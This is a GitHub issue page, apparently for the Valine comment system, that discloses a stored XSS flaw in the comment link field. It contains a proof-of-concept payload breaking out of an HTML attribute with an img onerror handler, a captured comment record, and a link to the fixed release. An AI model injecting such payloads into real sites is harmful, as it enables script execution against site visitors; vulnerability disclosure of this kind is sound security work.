We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
如果您想报告错误,请提供以下信息 If you want to report a bug, please provide the following information:
{"comment":"1\n","nick":"test","mail":"test@163.com","link":"\" ></a><img src=x onerror=alert(1)>","ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0","url":"/faq.html","QQAvatar":"","ip":"2406:da14:727:6700:2746:774b:2b87:6dbe","insertedAt":{"__type":"Date","iso":"2021-06-03T15:59:08.981Z"},"ACL":{"*":{"read":true}}}
核心payload为comment内容: \" ></a><img src=x onerror=alert(1)> 其效果为: https://valine.js.org/faq.html
payload
comment
\" ></a><img src=x onerror=alert(1)>
The text was updated successfully, but these errors were encountered:
https://github.com/xCss/Valine/releases/tag/v1.4.15
Sorry, something went wrong.
No branches or pull requests
评论链接存在XSS漏洞
如果您想报告错误,请提供以下信息 If you want to report a bug, please provide the following information:
使用burpsuite提交评论并抓包
poc:
核心
payload为comment内容:\" ></a><img src=x onerror=alert(1)>其效果为:
https://valine.js.org/faq.html
https://valine.js.org/faq.html 记得删除评论
The text was updated successfully, but these errors were encountered: